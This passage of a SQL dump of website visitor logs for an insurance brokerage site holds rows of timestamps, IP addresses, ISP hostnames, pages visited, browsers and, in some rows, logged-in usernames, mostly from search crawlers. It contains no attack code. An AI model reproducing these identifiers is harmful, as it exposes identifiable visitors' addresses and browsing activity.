4','','','','','','','','0','0',0),(16998,'0b_4483b846ca2c1fe82308f06cabe5165a','1460556448','148.159.128.51','148.159.128.51','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(17001,'0b_4483b846ca2c1fe82308f06cabe5165a','1460556492','148.159.128.51','148.159.128.51','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 48','us','1920 x 1080','Google','','','','','0','0',0),(17004,'0b_2ddd50b7f0e272d7d49b83b898653660','1460556602','148.159.128.51','148.159.128.51','/home/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(17007,'0b_2ddd50b7f0e272d7d49b83b898653660','1460556623','148.159.128.51','148.159.128.51','/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(17009,'0b_9876b5d0d7aaf194f4ac9a98e8853bf5','1460556646','148.159.128.51','148.159.128.51','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17012,'0b_9876b5d0d7aaf194f4ac9a98e8853bf5','1460556668','148.159.128.51','148.159.128.51','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17015,'0b_9876b5d0d7aaf194f4ac9a98e8853bf5','1460556669','148.159.128.51','148.159.128.51','/about-us/feed/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/about-us/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17016,'0b_9876b5d0d7aaf194f4ac9a98e8853bf5','1460556690','148.159.128.51','148.159.128.51','/?p=9','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/about-us/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17018,'0b_2ddd50b7f0e272d7d49b83b898653660','1460556712','148.159.128.51','148.159.128.51','/about-us/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(17019,'0b_aa3ba78c0606acdfe81ad4c1b46d127b','1460557555','69.30.198.178','69.30.198.178','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(17022,'0b_aa3ba78c0606acdfe81ad4c1b46d127b','1460557566','69.30.198.178','69.30.198.178','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(17025,'0b_0cf32458808e9f2b8b35dcb9d8d33adc','1460558319','69.30.211.2','69.30.211.2','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(17028,'0b_0cf32458808e9f2b8b35dcb9d8d33adc','1460558331','69.30.211.2','69.30.211.2','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(17030,'0b_0cf32458808e9f2b8b35dcb9d8d33adc','1460558341','69.30.211.2','69.30.211.2','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(17031,'0b_0cf32458808e9f2b8b35dcb9d8d33adc','1460558352','69.30.211.2','69.30.211.2','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(17033,'0b_b006d8a50e1e6acda95076a5b9051eb5','1460558632','157.55.39.91','msnbot-157-55-39-91.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17036,'0b_5946c9e5f02e376ec30c9628538c037b','1460558709','69.112.198.211','ool-4570c6d3.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(17037,'0b_5946c9e5f02e376ec30c9628538c037b','1460558711','69.112.198.211','ool-4570c6d3.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(17039,'0b_5946c9e5f02e376ec30c9628538c037b','1460558714','69.112.198.211','ool-4570c6d3.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(17040,'0b_5946c9e5f02e376ec30c9628538c037b','1460558731','69.112.198.211','ool-4570c6d3.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1600 x 900','','','','jspira1','','0','51',0),(17043,'0b_5adbfd3dc6a9d21c4ccee084b7dc8072','1460559701','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(17045,'0b_5adbfd3dc6a9d21c4ccee084b7dc8072','1460559705','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(17046,'0b_5adbfd3dc6a9d21c4ccee084b7dc8072','1460559707','184.154.139.23','placeholder.sitelock.com','/about-us/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(17048,'0b_5adbfd3dc6a9d21c4ccee084b7dc8072','1460559711','184.154.139.23','placeholder.sitelock.com','/insentives/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(17051,'0b_5adbfd3dc6a9d21c4ccee084b7dc8072','1460559720','184.154.139.23','placeholder.sitelock.com','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(17052,'0b_6a81375f644a819c68c5f2312ebcbda0','1460559855','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17054,'0b_4cf1a8263ca2784a4648651bdecb79e5','1460560260','157.55.39.91','msnbot-157-55-39-91.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17055,'0b_3c196c5c7e542efbf6c5e4e2c34494e7','1460560411','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17057,'0b_3c196c5c7e542efbf6c5e4e2c34494e7','1460560414','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17058,'0b_13d1d980481e7e5f8c7d43f06d136666','1460560700','157.55.39.210','msnbot-157-55-39-210.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17060,'0b_a41e6b4bc220a066e513382bdef09614','1460561400','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17061,'0b_019f59f3a7cfb1b544d7a116fa55ff9c','1460561417','157.55.39.210','msnbot-157-55-39-210.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17064,'0b_7fb6ddd527c56c172dd5944623d7db91','1460561684','157.55.39.91','msnbot-157-55-39-91.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17067,'0b_a41e6b4bc220a066e513382bdef09614','1460561767','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17070,'0b_019f59f3a7cfb1b544d7a116fa55ff9c','1460561781','157.55.39.210','msnbot-157-55-39-210.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17073,'0b_7fb6ddd527c56c172dd5944623d7db91','1460561784','157.55.39.91','msnbot-157-55-39-91.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17076,'0b_019f59f3a7cfb1b544d7a116fa55ff9c','1460561846','157.55.39.210','msnbot-157-55-39-210.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17079,'0b_7fb6ddd527c56c172dd5944623d7db91','1460561904','157.55.39.91','msnbot-157-55-39-91.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17082,'0b_5598724e9d6edb3fb1018ae7d99b06a3','1460562297','66.249.75.102','crawl-66-249-75-102.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17084,'0b_7fb6ddd527c56c172dd5944623d7db91','1460562346','157.55.39.91','msnbot-157-55-39-91.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17087,'0b_7fb6ddd527c56c172dd5944623d7db91','1460563163','157.55.39.31','msnbot-157-55-39-31.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17090,'0b_64c1a142ee4ebc07d95a887461a515b2','1460564012','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(17091,'0b_db41a44eac27ccfd64038c2b7ed4472a','1460564022','157.55.39.31','msnbot-157-55-39-31.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17093,'0b_64c1a142ee4ebc07d95a887461a515b2','1460564289','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(17096,'0b_64c1a142ee4ebc07d95a887461a515b2','1460564290','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(17099,'0b_f886dfe8cc62d2d0c8282d03aebaa194','1460564536','66.249.75.96','crawl-66-249-75-96.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17100,'0b_1e16ca19fb1d9e5e11c509e42def88ed','1460565020','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/?page_id=169','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(17102,'0b_64c1a142ee4ebc07d95a887461a515b2','1460565911','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(17105,'0b_f90dec02a72259bcb03e3546a3bcfe07','1460565930','66.249.75.103','crawl-66-249-75-103.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(17106,'0b_92fe76cd6c57e23ba5c0f2b71ea0a01b','1460567105','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(17109,'0b_92fe76cd6c57e23ba5c0f2b71ea0a01b','1460567106','68.180.230.123','b115363.yse.yahoo.net','/igo/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(17112,'0b_189567b8b66a3d0ab17c6ce7993bd909','1460567840','50.48.6.222','50-48-6-222.dsl1.monr.ny.frontiernet.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win10','Chrome 49','us','1600 x 900','Google','','','','','0','0',0),(17115,'0b_189567b8b66a3d0ab17c6ce7993bd909','1460567844','50.48.6.222','50-48-6-222.dsl1.monr.ny.frontiernet.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1600 x 900','','','','','','0','0',0),(17117,'0b_fa3d28f4cb1003648c35f093f90efc92','1460568996','66.249.75.95','crawl-66-249-75-95.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(17120,'0b_effc602e28bb956d720784321a62f711','1460569110','69.30.213.82','69.30.213.82','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','3','0',0),(17121,'0b_effc602e28bb956d720784321a62f711','1460569121','69.30.213.82','69.30.213.82','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','3','0',0),(17124,'0b_effc602e28bb956d720784321a62f711','1460569132','69.30.213.82','69.30.213.82','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','3','0',0),(17127,'0b_effc602e28bb956d720784321a62f711','1460569144','69.30.213.82','69.30.213.82','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','3','0',0),(17130,'0b_effc602e28bb956d720784321a62f711','1460569155','69.30.213.82','69.30.213.82','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','3','0',0),(17133,'0b_effc602e28bb956d720784321a62f711','1460569167','69.30.213.82','69.30.213.82','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','3','0',0),(17136,'0b_effc602e28bb956d720784321a62f711','1460569178','69.30.213.82','69.30.213.82','/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','3','0',0),(17138,'0b_bf15ffbc9c5f0ee3a106c63d393a67a4','1460569934','148.251.153.69','static.69.153.251.148.clients.your-server.de','/calc.html','WordPress/4.3.1; http://mortgagedebtor.com','','',0,'','','de','','','WordPress','','','','0','0',0),(17139,'0b_5c09c4230cf54481b6bed23e03a17a07','1460570887','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17141,'0b_64c1a142ee4ebc07d95a887461a515b2','1460571671','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(17144,'0b_64c1a142ee4ebc07d95a887461a515b2','1460571673','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(17147,'0b_ee18471ab8b03fcc9273adf7cae0afc4','1460573384','108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','1920 x 1080','Google','','','','','0','0',0),(17150,'0b_ee18471ab8b03fcc9273adf7cae0afc4','1460573387','108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(17153,'0b_ee18471ab8b03fcc9273adf7cae0afc4','1460573408','108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(17154,'0b_ee18471ab8b03fcc9273adf7cae0afc4','1460573428','108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','joel32','','0','51',0),(17156,'0b_017f75ac38cc7bef4eb57a8540d4aa4b','1460575307','151.138.13.244','151.138.13.244','/','SuperPagesUrlVerifyBot/1.0','','',0,'','','','','','SuperPagesUrlVerifyBot','','','','0','0',0),(17159,'0b_64c1a142ee4ebc07d95a887461a515b2','1460576589','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(17160,'0b_64c1a142ee4ebc07d95a887461a515b2','1460576591','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(17162,'0b_d3b905a0aa062cd50e405ac72ed5f380','1460576637','66.249.75.95','crawl-66-249-75-95.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17165,'0b_64c1a142ee4ebc07d95a887461a515b2','1460576721','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(17168,'0b_b716f0d7d4a18eda95f7958881b99a96','1460577030','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17169,'0b_64c1a142ee4ebc07d95a887461a515b2','1460578002','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(17171,'0b_64c1a142ee4ebc07d95a887461a515b2','1460578278','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(17172,'0b_64c1a142ee4ebc07d95a887461a515b2','1460578279','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(17174,'0b_64c1a142ee4ebc07d95a887461a515b2','1460578283','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(17177,'0b_64c1a142ee4ebc07d95a887461a515b2','1460578429','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(17178,'0b_64c1a142ee4ebc07d95a887461a515b2','1460578436','108.58.88.178','ool-6c3a58b2.static.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carriers/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(17180,'0b_32c64f6d46526e62e2616e3d1d78143b','1460578459','157.55.39.210','msnbot-157-55-39-210.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17183,'0b_4af0d88a931bca865a9d937f82710914','1460579024','45.79.89.188','li1188-188.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(17184,'0b_89e71b0548694bf81def0e06357d1fcb','1460579085','69.112.198.211','ool-4570c6d3.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1600 x 900','','','','jspira1','','0','0',0),(17186,'0b_89e71b0548694bf81def0e06357d1fcb','1460579087','69.112.198.211','ool-4570c6d3.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','jspira1','','0','0',0),(17187,'0b_89e71b0548694bf81def0e06357d1fcb','1460579091','69.112.198.211','ool-4570c6d3.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','jspira1','','0','51',0),(17190,'0b_89e71b0548694bf81def0e06357d1fcb','1460579099','69.112.198.211','ool-4570c6d3.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1600 x 900','','','','jspira1','','0','51',0),(17192,'0b_0ead8c5c0178410eab9710881e3aa1c9','1460579277','157.55.39.31','msnbot-157-55-39-31.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(17193,'0b_968db4eee04a2e290e6a997643caf69b','1460579442','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(17196,'0b_968db4eee04a2e290e6a997643caf69b','1460579443','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(17198,'0b_2e6183d3521f327d14bd57baca8e7cc4','1460580087','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17199,'0b_8c336ab3cee523b0afc7f7383e8178d4','1460580315','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','','',0,'Win7','Chrome 43','us','','','','','zenwirth','','0','0',0),(17201,'0b_8c336ab3cee523b0afc7f7383e8178d4','1460580317','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','','','','','zenwirth','','0','0',0),(17202,'0b_ee486d7a0fb309f7ae54c6d6c6b9aad6','1460581975','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(17205,'0b_ee486d7a0fb309f7ae54c6d6c6b9aad6','1460581978','100.43.81.146','spider-100-43-81-146.yandex.com','/SSO/235_29.html','Mozilla/5.0 (compatible; YandexBot/3.0; 